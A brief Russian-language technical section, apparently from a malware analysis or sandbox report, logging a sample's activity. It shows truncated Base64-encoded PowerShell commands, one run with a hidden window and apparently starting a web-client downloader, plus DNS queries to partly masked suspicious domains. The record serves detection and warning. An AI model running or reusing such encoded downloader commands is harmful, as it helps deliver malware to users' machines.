Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAF8ANAA5AF8AXwA0ADYAPQAoACcAUwAnACsAJwBfADIAXwAwAF8AJwApADsAJABqADEANgAyAF8AMwAyADMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdABfADUANwBfADUAXwA9ACgAJwBoAH...
- DNS ASK po####verhotel.com
- DNS ASK de####perparrot.com
- DNS ASK bk#######tory.mdscreative.com
- DNS ASK vi##52.com
- DNS ASK bv##.##tphamtamlinh.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAF8ANAA5AF8AXwA0ADYAPQAoACcAUwAnACsAJwBfADIAXwAwAF8AJwApADsAJABqADEANgAyAF8AMwAyADMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdABfADUANwBfADUAXwA9ACgAJwBoAH...' (со скрытым окном)